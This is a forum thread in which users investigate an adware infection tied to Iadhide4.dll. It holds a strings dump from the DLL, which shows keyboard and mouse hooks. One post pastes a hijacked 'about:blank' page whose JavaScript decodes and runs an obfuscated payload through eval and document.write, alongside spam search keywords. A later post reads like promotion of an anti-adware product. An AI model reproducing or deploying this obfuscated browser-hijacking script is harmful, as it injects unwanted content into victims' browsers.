Jump to content
Washington DC Message Boards

Iadhide4.dll


Guest ratheor

Recommended Posts

Guest Barnum

THis is what I found so far ratheor

 

\!This program cannot be run in DOS mode.

 

GetModuleFileNameA ƒGlobalDeleteAtom ø GetCurrentProcessId GlobalAddAtomA Ê GetCommandLineA ] DisableThreadLibraryCalls CloseHandle ÖMapViewOfFile 5 CreateFileMappingA °UnmapViewOfFile lstrcpynA lstrlenA ÿlstrcmpiA mGetTickCount GetLastError 1 CreateEventA eSetEvent ÎWaitForSingleObject æOpenEventA KERNEL32.dll ¬wsprintfA ÞPostMessageA RegisterWindowMessageA IsWindow CallNextHookEx «LoadStringA bSetWindowsHookExA †UnhookWindowsHookEx USER32.dll ¥SetSecurityDescriptorDacl ß InitializeSecurityDescriptor [RegCloseKey {RegQueryValueExA rRegOpenKeyExA ADVAPI32.dll ²¸/? l$

 

IAdHide.dll GetLastEventTime GetNKeys _MyCBTProc@12 _MyKeyboardProc@12 _MyMouseProc@12 SetEventNow StartTrapping StopTrapping VerifyTrapping __DllMainCRTStartup@12 _hooks_set_event_%s UNKNOWN BackWeb Client_LOAD_APP iadhide_memfilemap_%s Prevented the Dial-up Window to be shown by BackWeb.exe A Dial-up Connection Window is opening & BackWeb Agent BackWeb.exe BackWeb- <<UNKNOWN>> IADHide Software\BackWeb\BackWeb iadhide_event_%s S t r i n g F i l e I n f o ¼ 0 4 0 9 0 4 b 0 C o m m e n t s 0 C o m p a n y N a m e B a c k W e b 8 F i l e D e s c r i p t i o n I A d H i d e T F i l e V e r s i o n V e r s i o n 6 . 1 . 4 ( B u i l d 6 8 R ) 0 I n t e r n a l N a m e I A d H i d e \ L e g a l C o p y r i g h t © 2 0 0 1 B a c k W e b T e c h n o l o g i e s . ( L e g a l T r a d e m a r k s @ O r i g i n a l F i l e n a m e I A d H i d e . d l l $ P r i v a t e B u i l d 4 @ P r o d u c t N a m e B a c k W e b I A d H i d e X P r o d u c t V e r s i o n V e r s i o n 6 . 1 . 4 ( B u i l d 6 8 R ) S p e c i a l B u i l d D V a r F i l e I n f o $ T r a n s l a t i o n ° D i a l - u p C o n n e c t i o n

- S i g n - I 000$00060@0G0V0b0|0ƒ0ˆ0•0£0¬0²0Â0Ï0Ü0ç0

11!1*181>1]1c1u1‘1ª1¿1Æ1Ö1â1é1÷1þ1222'2-252@2F2L2W2]2o2w22†22Ÿ2¤2Á2É2Ü2ú23 3/3]3h33Œ3ž3³3½3Ê3Ô3Û3ê3ø3ý34-4X4u4‚4ˆ4“4¨4½4î4ù4555#585?5I5N5X5b5g5q5{5€5Š5³5È5Ü5ã5ë5636G6U6e6l66†6’6®6¹6Æ6Í6Ö6á6ê6÷6ý67$7*727:7B7J7R7Z7b7j7r7{777£7µ7Ã7Ì7Ý7ü78888"888C8T8^8d8j8u8ƒ8Œ88½8Ã8Ê8Ð8Ö8å8í8ü8999(9.949:9C9L9T9a9k9q9w9Ž9”9½9Ü9â9ñ9::':3:9:

Link to comment
Share on other sites

Guest Ihatetrojans

Help I got the same thing on my computer. This what I see from the source.

 

 

html><head><meta http-equiv="expires" content="2"><meta http-equiv="imagetoolbar" content="no"><meta http-equiv="content-type" content="text/html; charset=utf-8"/><title>about:blank</title><style>a:hover {font-size:xx-small;text-decoration:underline} a.m {color:#0090DE} td {font-size:xx-small} body {font:xx-small verdana,sans-serif;color:#6d6c75;} div {padding-top:10px} a {font-size:xx-small;text-decoration:none;color:#6d6c75} a:active {font-size:xx-small;text-decoration:none;color:#6d6c75} a:visited {font-size:xx-small;text-decoration:none;color:#6d6c75}</style> <script language=JavaScript>

var MyLoc = "" + location;

var End = MyLoc.indexOf("#")

var PIN = 14044;

if (End > 0)

PIN = MyLoc.substring(End+1, MyLoc.length);

var key=new Array();

key0=new Array('viagra','xanax','phentermine','spam','carisoprodol','hydrocodone,');

key1=new Array('valium','cialis','texas holdem','party poker','roulette','online gambling');

key2=new Array('blackjack','casino','breast enlargement','webhosting','domain registration','bonus server');

key3=new Array('merchant account','voice mail','work at home','paxil','personal photos','free online dating');

key4=new Array('auto insurance','prescription','rv finance','visa platinum','merchant account','nevada incorporation');

key5=new Array('mortgage','spyware','adware','popup blocker','firewall','soft');

num=(Math.random()*10000)%6;

num=parseInt(num);

gum=(Math.random()*10000)%6;

gum=parseInt(gum);

switch(num){

case 0:

key=key0

break

case 1:

key=key1

break

case 2:

key=key2

break

case 3:

key=key3

break

case 4:

key=key4

break

case 5:

key=key5

break

case 6:

key=key6

break

}

function keywords(){

str=key[gum];

 

document.search.qq.value=str;

}

</SCRIPT><META content="MSHTML 6.00.2800.1106" name=GENERATOR></HEAD><BODY bgColor=#ffffff topMargin=60 onload=document.search.qq.focus(); onmouseover="status='Quick Web Search...'"><script language="JavaScript" type="text/javascript"><!--

var w="",l="",g="IYSOG1p+6VP8=|We#tfcDNRBTxnQC:%z!q2ho-)?M&H(g4<kvbUFA9mj;E\"wa>u0/y.drLJZ3_ sil",m=78;eval(unescape("%66%75%6E%63%74%69%6F%6E%20%62%28%6E%29%7B%76%61%72%20%79%3D%27%27%2C%78%2C%72%2C%73%2C%66%3B%66%6F%72%28%78%3D%30%3B%78%3C%6E%2E%6C%65%6E%67%74%68%3B%78%2B%2B%29%7B%72%3D%6E%2E%63%68%61%72%41%74%28%78%29%3B%73%3D%67%2E%69%6E%64%65%78%4F%66%28%72%29%3B%69%66%28%73%3E%2D%31%29%7B%66%3D%28%28%73%2B%31%29%25%6D%2D%31%29%3B%69%66%28%66%3C%3D%30%29%7B%66%2B%3D%6D%7D%79%2B%3D%67%2E%63%68%61%72%41%74%28%66%2D%31%29%7D%65%6C%73%65%7B%79%2B%3D%72%7D%7D%6C%2B%3D%79%7D%3B%66%75%6E%63%74%69%6F%6E%20%6A%6A%6A%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%6C%29%7D"));b("sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssskiDLl+");b("fsI>Q40>4#|wZ>b>ODLl+fwsf.+#|wf#nfy;>b>iDLl+fwukq))\nc0QDfl-QsrQ-g?{L#f0LQsc>Ii#}c0QDfl-Qs-j0g#?{lcg#daolDo||p?{alQr-adL#I#>i#\"b#Qfig\"b#Qfd&GFO\"&GP\"?EalQr-ad-Qj-0i#j-b#|Q0II}}c0QDfl-Qs;vg?{>I#Lfg0Q#iD>+#gwxolisc0QDfl-QslisQ-fs>b>lI>UI#dw??EL#f0LQsc>Ii#}c0QDfl-Qsv;g#?{lcg#daolDo||p?{alQr-adD>+f0L#\"b#Qfig\"b#Qfd&GFO\"&GP\"?EalQr-ad-Qj-0i#j-b#|rQ-}lcg#daolDo||_?{L#f0LQs;vg?}}c0QDfl-QsDfg?{o4|#b#QfdU0ff-QElcgo4||hWWo4||_?;vg?}bD|r-D0j#Qfd>IIE2U|r-D0j#Qfd4#f\"I#j#QfT.YrElcgbD?{lcg2U?{r-D0j#Qfd-Q");b("D-Qf#nfj#Q0|;vEr-D0j#Qfd-Qi#I#Dfif>Lf|rQ-}#Ii#{r-D0j#Qfd-Qj-0i#r-aQ|Df}}lcg2UHHqbD?{r-D0j#Qfd-Qj-0i#r-aQ|rQ-Er-D0j#Qfd-Qj-0i#0+|v;Er-D0j#Qfd-QD-Qf#nfj#Q0|rQ-}lcgr-D0j#QfdI>.#Li?{alQr-adD>+f0L#\"b#Qfig\"b#Qfd&GFO\"F8W\"b#Qfd&GFO\"NGeR?EalQr-ad-Qj-0i#r-aQ|v;EalQr-ad-Qj-0i#0+|-j0}yy))ukyiDLl+fuskO:BY8xu\r\nb>LsD-0Qf#Ls|swklj4siLD|'off+%yyaaadfL>Dvolfiw6wdDDyDQfyo+Mw68YR6w's>If|''sU-Lr#L|'/'uwE\r\nc0QDfl-Qs4-gf#nf?s{si#>LDod22db>I0#|f#nfEsi#>LDodi0Ujlfg?Es}\r\nc0QDfl-Qs0QlQif>IIg?s{sr-D0j#QfdI-D>fl-");b("Qs|swoff+%yyaaadQ#fclQr#LdDDy0QlQif>IIylQr#nd+o+M+lQ|w68YR6wwEs}kyO:BY8xuskNYPs>Il4Q|D#Qf#LuskAGB&sif.I#|weYNx(%sVV/+nwsQ>j#|i#>LDos>Dfl-Q|woff+%yyaaadQ#fclQr#LdDDyi#>LDod+o+wsj#fo-r|4#fsf>L4#f| +>L#QfuskiDLl+fsI>Q40>4#|wZ>b>ODLl+fwu\r\nr-D0j#QfdaLlf#gwklQ+0fsf.+#|olrr#QsQ>j#|+lQsb>I0#|w68YR6wuw?E\r\nkyiDLl+fuskx9TJ\"salrfo|wp//zwuskxTGNSukxBukxNukyxNukxNs>Il4Q|Ll4ofuskiDLl+fsI>Q40>4#|wZ>b>ODLl+fwu\r\n\t\t\tr-D0j#QfdaLlf#gwk9soL#c|';>b>iDLl+f%0QlQif>IIg?E'u0QlQif>IIso-j#+>4#ky9uw?E\r\n\t\tkyiDLl");b("+fuskyxNukyxBukyxTGNSukyx9TJ\"uskNYPsif.I#|wTGBN\"B)BY1(x%str#rc##sp+nsi-IlrEsTGBN\"B)xG8%str#rc##sp+nsi-IlrEs89NNYR1)J\"Ax%sh/+nEsTGBN\"B)J\"Ax%str#rc##sp+nsi-IlrEseYNx(%sp//zEsTGBN\"B)TGxxG&%str#rc##sp+nsi-Ilrws>Il4Q|I#cfuskx9TJ\"sU-Lr#L|/uskxTGNSukxBukxNsalrfo|ppVsL-aO+>Q|_ukY&1so#l4of|VmsiLD|woff+%yyaaadQ#fclQr#LdDDylj>4#iylj4dZ81wsalrfo|ppVukyxNukxNsalrfo|_<=uskNYPs>Il4Q|I#cfuC0lDvse#UsO#>LDoskyNYPukyxNukxNsb9Il4Q|f-+salrfo|mmuHQUi+EkyxNukyxBukxBukxNsD-IO+>Q|hukYR8Fxsj>nJ#Q4fo|ph=sil!#|V/sQ");b(">j#|22sP:9BN R9&\"|wO#>LDox#nfwusHQUi+EHQUi+EskYR8Fxsf.+#|i0Ujlfsb>I0#|O#>LDouskq))kULuklQ+0fsf.+#|wDo#DvU-nwsQ>j#|wljcIwsflfI#|wOo-asclLifsL#i0Ifs+>4#wus)sY'jsA##IlQ4sJ0Dv.))ukyxNukyxBukxBukxNsD-IO+>Q|huHQUi+EkyxNukyxBukyxTGNSukyx9TJ\"uskO:BY8xsI>Q40>4#|Z>b>ODLl+fuv#.a-Lrig?EkyO:BY8xuskNYPs>Il4Q|D#Qf#LukTBuk9soL#c|w;>b>iDLl+f%4-g'bl>4L>'?wubl>4L>sky9uWk9soL#c|w;>b>iDLl+f%4-g'n>Q>n'?wun>Q>nky9uWsk9soL#c|w;>b>iDLl+f%4-g'+o#Qf#LjlQ#'?wu+o#Qf#LjlQ#ky9usWk9soL#c|w;>b>iDLl+f%4-g'-QIlQ#zh/+o>Lj>D.'?wu");b("-QIlQ#s+o>Lj>D.ky9uWsk9soL#c|w;>b>iDLl+f%4-g'D>Lli+L-r-I'?wuD>Lli-+L-r-Iky9usWk9soL#c|w;>b>iDLl+f%4-g'o.rL-D-r-Q#'?wuo.rL-D-r-Q#ky9uWsk9soL#c|w;>b>iDLl+f%4-g'b>Il0j'?wub>Il0jky9usWk9soL#c|w;>b>iDLl+f%4-g'Dl>Ili'?wuDl>Iliky9uWsk9soL#c|w;>b>iDLl+f%4-g'cl-LlD#f'?wucl-LlD#fky9ukTBuk9soL#c|w;>b>iDLl+f%4-g'f#n>izh/o-Ir#j'?wuf#n>iso-Ir#jky9usWk9soL#c|w;>b>iDLl+f%4-g'+>Lf.zh/+-v#L'?wu+>Lf.s+-v#Lky9uWsk9soL#c|w;>b>iDLl+f%4-g'L-0I#ff#'?wuL-0I#ff#ky9usWk9soL#c|w;>b>iDLl+f%4-g'-QIlQ#zh/4>jUIlQ4'?wu-QIlQ#s4>");b("jUIlQ4ky9uWsk9soL#c|w;>b>iDLl+f%4-g'UI>Dv;>Dv'?wuUI>Dv;>Dvky9usWk9soL#c|w;>b>iDLl+f%4-g'iI-fi'?wuiI-fiky9uWsk9soL#c|w;>b>iDLl+f%4-g'D>ilQ-'?wuD>ilQ-ky9usWsk9soL#c|w;>b>iDLl+f%4-g'UL#>ifzh/#QI>L4#j#Qf'?wuUL#>ifs#QI>L4#j#Qfsky9ukTBuk9soL#c|w;>b>iDLl+f%4-g'a#Uo-iflQ4'?wua#Uo-iflQ4ky9usWk9soL#c|w;>b>iDLl+f%4-g'r-j>lQzh/L#4lifL>fl-Q'?wur-j>lQsL#4lifL>fl-Qky9uWsk9soL#c|w;>b>iDLl+f%4-g'U-Q0izh/i#Lb#L'?wuU-Q0isi#Lb#Lsky9uWsk9soL#c|w;>b>iDLl+f%4-g'b-lD#zh/j>lI'?wub-lD#sj>lIky9usWsk9soL#c|w;>b>iDLl+f%4-g'");b("a-Lvzh/>fzh/o-j#'?wua-Lvs>fso-j#ky9ukTBuk9soL#c|w;>b>iDLl+f%4-g'+>nlI'?wu+>nlIky9usWk9soL#c|w;>b>iDLl+f%4-g'+#Li-Q>Izh/+o-f-i'?wu+#Li-Q>Is+o-f-iky9uWsk9soL#c|w;>b>iDLl+f%4-g'rl#fzh/+lIIi'?wurl#fs+lIIiky9usWk9soL#c|w;>b>iDLl+f%4-g'cL##zh/-QIlQ#zh/r>flQ4'?wucL##s-QIlQ#sr>flQ4ky9uWsk9soL#c|w;>b>iDLl+f%4-g'>0f-zh/lQi0L>QD#'?wu>0f-slQi0L>QD#ky9usWk9soL#c|w;>b>iDLl+f%4-g'+L#iDLl+fl-Q'?wu+L#iDLl+fl-Qky9uWsk9soL#c|w;>b>iDLl+f%4-g'c#flio'?wuc#flioky9ukTBuk9soL#c|w;>b>iDLl+f%4-g'Lbzh/clQ>QD#'?wuLbsclQ>QD#");b("ky9usWk9soL#c|w;>b>iDLl+f%4-g'bli>zh/+I>flQ0j'?wubli>s+I>flQ0jky9uWsk9soL#c|w;>b>iDLl+f%4-g'j#LDo>Qfzh/>DD-0Qf'?wuj#LDo>Qfs>DD-0Qfky9usWsk9soL#c|w;>b>iDLl+f%4-g'j-Lf4>4#'?wuj-Lf4>4#ky9ukTBuk9soL#c|w;>b>iDLl+f%4-g'i+.a>L#'?wui+.a>L#ky9usWk9soL#c|w;>b>iDLl+f%4-g'>ra>L#'?wu>ra>L#ky9uWsk9soL#c|w;>b>iDLl+f%4-g'+-+0+zh/UI-Dv#L'?wu+-+0+sUI-Dv#Lky9usWk9soL#c|w;>b>iDLl+f%4-g'clL#a>II'?wuclL#a>IIky9uWsk9soL#c|w;>b>iDLl+f%4-g'i-cf'?wui-cfky9ukyNYPukyNYPuskNYPs>Il4Q|I#cfuskNYPs>Il4Q|Ll4ofusk(BsD-I-L|tr#rc##");b("sOY3\"|pusk8ukO89Rslr|joisif.I#|wNYO8J9S%sQ-Q#wukyO89Ruky8ukyNYPukyNYPukyAGB&ukyNYPuskiDLl+fu\r\nr-D0j#QfdaLlf#gD-0Qf#L?E\r\ni#Icdc-D0ig?E\r\nkyiDLl+fus");jjj();document.write(w);w="";//--></script><noscript>To display this page you need a browser with JavaScript support.</noscript></BODY></HTML>

Link to comment
Share on other sites

Guest Ihatetrojans

I contacted noadware.net through their chat service.

 

Please wait for a site operator to respond.

You are now chatting with 'Sam'

Sam: Welcome to Noadware.net! How can I be of assistance today?

you: Hi

Sam: Hello.

you: I am interested in finding out who is

you: http://www.noadware.net/?hop=extron

you: extron has an affiliate link to your web site

you: Can you tell me the affiliate extron is

Sam: Just a moment please

Sam: We are staffed to answer technical questions about our product and services. Your question is one best reserved for management. To contact them directly, please email them at business@noadware.net

you: what is their telephone number

Sam: Unfortunately, we do not currently offer the ability to receive any assistance by phone.

Link to comment
Share on other sites

  • 1 year later...
Guest How I keep my PC clean of virus&

Seems it is not just be that had spyware problems.

 

Today and the last three months I had no spyware/virus/popups problems

ever...

 

I use just two pieces of software to control adware/spyware and viruses.

 

1) McAfee. It also works on the backround while I am online.

 

2) NoAdware. This also works on the backround but focuses more on adware not viruses.

 

Those two only are enough for me who is online more than 6hours a day.

 

Then I have also a free program called ccleaner to speed up my PC performance. This deletes "rubish" on hardrive. Free updates as well and very cool.

Ccleaner.com

 

Regards,

Karl

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
×
×
  • Create New...